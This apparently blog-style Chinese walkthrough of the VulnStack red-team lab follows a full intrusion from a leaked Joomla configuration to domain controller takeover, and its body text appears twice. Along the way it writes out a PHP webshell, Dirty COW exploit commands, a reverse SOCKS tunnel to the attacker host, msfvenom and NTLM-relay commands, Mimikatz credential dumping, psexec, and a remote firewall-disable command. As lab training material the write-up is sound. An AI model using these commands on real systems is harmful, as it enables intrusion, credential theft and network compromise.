1. VulnStack靶场与ATTCK框架实战入门第一次接触VulnStack红日靶场时我被它高度仿真的企业内网环境震撼到了。这个靶场完美模拟了从外网渗透到域控攻防的完整链条特别适合想实战演练ATTCK矩阵的技术爱好者。不同于其他靶场的单点突破这里你需要像真实攻击者一样思考如何通过MySQL信息泄露打开突破口如何在内网中隐蔽移动最终拿下域控服务器。靶场环境包含五台主机运行Joomla的Web服务器CentOSUbuntu双机、Windows 7客户端、Windows Server 2008成员服务器以及作为域控的Windows Server 2012。攻击起点就是那个暴露在公网的Joomla网站而最终目标则是域控制器上的机密文件。整个攻击路径涉及Web渗透、权限提升、横向移动、凭证窃取等十余个ATTCK战术节点堪称企业内网渗透的教科书式案例。2. 外网突破从信息泄露到Webshell获取2.1 信息收集与漏洞发现端口扫描是渗透测试的起手式。用nmap扫描目标IP发现开放了22(SSH)、80(HTTP)、3306(MySQL)三个端口。其中80端口的Joomla网站最引人注目——这个开源CMS历史上漏洞不少。我尝试用admin/admin等常见弱口令登录后台无果又测试了SQL注入也未成功。转折点出现在目录扫描。通过DirBuster发现/configuration.php文件这个Joomla配置文件意外暴露了数据库凭据testuser/cvcvgjASD!。这种信息泄露在真实环境中很常见很多管理员会忽略配置文件的权限设置。2.2 MySQL利用与后台接管拿到数据库凭据后我直接用MySQL客户端连接mysql -h 192.168.119.118 -u testuser -p输入密码后成功登录但接下来才是难点。需要在不知道表结构的情况下修改管理员密码这里有几个关键步骤找到jos_users表存储用户信息密码字段需要MD5加密格式明文盐值需同步修改jos_user_usergroup_map中的权限组ID通过以下SQL语句成功创建超级管理员UPDATE jos_users SET passwordMD5(secret) WHERE usernameadmin; UPDATE jos_user_usergroup_map SET group_id8 WHERE user_id(SELECT id FROM jos_users WHERE usernameadmin);2.3 Webshell部署与绕过限制登录后台后在Beez3模板的index.php插入PHP一句话木马?php system($_GET[cmd]); ?但访问时发现系统禁用了危险函数。这时需要上传特殊的绕过脚本如phpinfo.php检查环境最终通过LD_PRELOAD劫持技术绕过disable_functions限制成功获得系统命令执行权限。3. 内网渗透提权与隧道搭建3.1 内网信息收集获取shell后发现主机存在双网卡外网IP192.168.119.118内网IP192.168.93.100通过ifconfig发现内网段192.168.93.0/24还找到一组SSH凭据(wwwuser/wwwuser_123Aqx)。这提示我们内网可能存在更多资产。3.2 脏牛漏洞提权当前只是www-data权限需要提权到root。检查内核版本发现是Linux 3.10.0存在著名的脏牛(Dirty Cow)漏洞(CVE-2016-5195)。操作步骤下载exp代码并编译gcc -pthread dirty.c -o dirty -lcrypt执行exp创建root权限用户./dirty mypassword切换用户后获得完整控制权3.3 内网代理搭建为了穿透到内网需要建立SOCKS代理。这里用EarthWorm工具# 攻击机执行 ./ew -s rcsocks -l 1080 -e 8888 # 靶机执行 ./ew -s rssocks -d 攻击机IP -e 8888配置proxychains后所有扫描工具都能通过这个隧道访问内网。记得修改/etc/proxychains.conf设置socks5 127.0.0.1 1080。4. 横向移动从主机到域控4.1 NTLM Relay攻击实战内网扫描发现Windows主机后采用NTLM Relay攻击获取凭证用msfvenom生成木马msfvenom -p windows/meterpreter/bind_tcp LHOST192.168.93.100 LPORT4444 -f exe -o shell.exe启动SMB中继服务python3 smbrelayx.py -h 192.168.93.20 -e shell.exe诱使内网用户访问恶意SMB服务捕获哈希并反弹shell4.2 域管理员定位拿到一台域成员主机后使用PVEFindADUser.exe定位域管理员登录位置.\PVEFindADUser.exe -current结果显示域管理员当前登录在192.168.93.10域控。4.3 令牌窃取与域控攻陷通过Mimikatz的Kiwi模块抓取密码load kiwi kiwi_cmd sekurlsa::logonpasswords获取域管凭证后使用psexec模块攻击域控use exploit/windows/smb/psexec set SMBUser administrator set SMBPass zxcASDqw123!! set rhosts 192.168.93.10 run遇到防火墙拦截时可先远程关闭防护sc \\192.168.93.10 create disablefirewall binpathnetsh advfirewall set allprofiles state off5. 防御视角的思考站在蓝队角度这个攻击链中有多个防御机会点配置文件的权限管控MySQL的远程访问限制及时的内核漏洞修补网络分段与主机隔离SMB签名等中间人攻击防护整个渗透过程就像一场精心设计的棋局每个技术点都对应着ATTCK矩阵中的战术编号。这种实战演练比单纯看理论文档收获大得多特别是对理解内网渗透的完整链条帮助巨大。建议有兴趣的朋友可以自己搭建环境复现但切记仅限授权测试。
VulnStack-ATTCK实战:从外网渗透到域控攻防的完整链条
1. VulnStack靶场与ATTCK框架实战入门第一次接触VulnStack红日靶场时我被它高度仿真的企业内网环境震撼到了。这个靶场完美模拟了从外网渗透到域控攻防的完整链条特别适合想实战演练ATTCK矩阵的技术爱好者。不同于其他靶场的单点突破这里你需要像真实攻击者一样思考如何通过MySQL信息泄露打开突破口如何在内网中隐蔽移动最终拿下域控服务器。靶场环境包含五台主机运行Joomla的Web服务器CentOSUbuntu双机、Windows 7客户端、Windows Server 2008成员服务器以及作为域控的Windows Server 2012。攻击起点就是那个暴露在公网的Joomla网站而最终目标则是域控制器上的机密文件。整个攻击路径涉及Web渗透、权限提升、横向移动、凭证窃取等十余个ATTCK战术节点堪称企业内网渗透的教科书式案例。2. 外网突破从信息泄露到Webshell获取2.1 信息收集与漏洞发现端口扫描是渗透测试的起手式。用nmap扫描目标IP发现开放了22(SSH)、80(HTTP)、3306(MySQL)三个端口。其中80端口的Joomla网站最引人注目——这个开源CMS历史上漏洞不少。我尝试用admin/admin等常见弱口令登录后台无果又测试了SQL注入也未成功。转折点出现在目录扫描。通过DirBuster发现/configuration.php文件这个Joomla配置文件意外暴露了数据库凭据testuser/cvcvgjASD!。这种信息泄露在真实环境中很常见很多管理员会忽略配置文件的权限设置。2.2 MySQL利用与后台接管拿到数据库凭据后我直接用MySQL客户端连接mysql -h 192.168.119.118 -u testuser -p输入密码后成功登录但接下来才是难点。需要在不知道表结构的情况下修改管理员密码这里有几个关键步骤找到jos_users表存储用户信息密码字段需要MD5加密格式明文盐值需同步修改jos_user_usergroup_map中的权限组ID通过以下SQL语句成功创建超级管理员UPDATE jos_users SET passwordMD5(secret) WHERE usernameadmin; UPDATE jos_user_usergroup_map SET group_id8 WHERE user_id(SELECT id FROM jos_users WHERE usernameadmin);2.3 Webshell部署与绕过限制登录后台后在Beez3模板的index.php插入PHP一句话木马?php system($_GET[cmd]); ?但访问时发现系统禁用了危险函数。这时需要上传特殊的绕过脚本如phpinfo.php检查环境最终通过LD_PRELOAD劫持技术绕过disable_functions限制成功获得系统命令执行权限。3. 内网渗透提权与隧道搭建3.1 内网信息收集获取shell后发现主机存在双网卡外网IP192.168.119.118内网IP192.168.93.100通过ifconfig发现内网段192.168.93.0/24还找到一组SSH凭据(wwwuser/wwwuser_123Aqx)。这提示我们内网可能存在更多资产。3.2 脏牛漏洞提权当前只是www-data权限需要提权到root。检查内核版本发现是Linux 3.10.0存在著名的脏牛(Dirty Cow)漏洞(CVE-2016-5195)。操作步骤下载exp代码并编译gcc -pthread dirty.c -o dirty -lcrypt执行exp创建root权限用户./dirty mypassword切换用户后获得完整控制权3.3 内网代理搭建为了穿透到内网需要建立SOCKS代理。这里用EarthWorm工具# 攻击机执行 ./ew -s rcsocks -l 1080 -e 8888 # 靶机执行 ./ew -s rssocks -d 攻击机IP -e 8888配置proxychains后所有扫描工具都能通过这个隧道访问内网。记得修改/etc/proxychains.conf设置socks5 127.0.0.1 1080。4. 横向移动从主机到域控4.1 NTLM Relay攻击实战内网扫描发现Windows主机后采用NTLM Relay攻击获取凭证用msfvenom生成木马msfvenom -p windows/meterpreter/bind_tcp LHOST192.168.93.100 LPORT4444 -f exe -o shell.exe启动SMB中继服务python3 smbrelayx.py -h 192.168.93.20 -e shell.exe诱使内网用户访问恶意SMB服务捕获哈希并反弹shell4.2 域管理员定位拿到一台域成员主机后使用PVEFindADUser.exe定位域管理员登录位置.\PVEFindADUser.exe -current结果显示域管理员当前登录在192.168.93.10域控。4.3 令牌窃取与域控攻陷通过Mimikatz的Kiwi模块抓取密码load kiwi kiwi_cmd sekurlsa::logonpasswords获取域管凭证后使用psexec模块攻击域控use exploit/windows/smb/psexec set SMBUser administrator set SMBPass zxcASDqw123!! set rhosts 192.168.93.10 run遇到防火墙拦截时可先远程关闭防护sc \\192.168.93.10 create disablefirewall binpathnetsh advfirewall set allprofiles state off5. 防御视角的思考站在蓝队角度这个攻击链中有多个防御机会点配置文件的权限管控MySQL的远程访问限制及时的内核漏洞修补网络分段与主机隔离SMB签名等中间人攻击防护整个渗透过程就像一场精心设计的棋局每个技术点都对应着ATTCK矩阵中的战术编号。这种实战演练比单纯看理论文档收获大得多特别是对理解内网渗透的完整链条帮助巨大。建议有兴趣的朋友可以自己搭建环境复现但切记仅限授权测试。
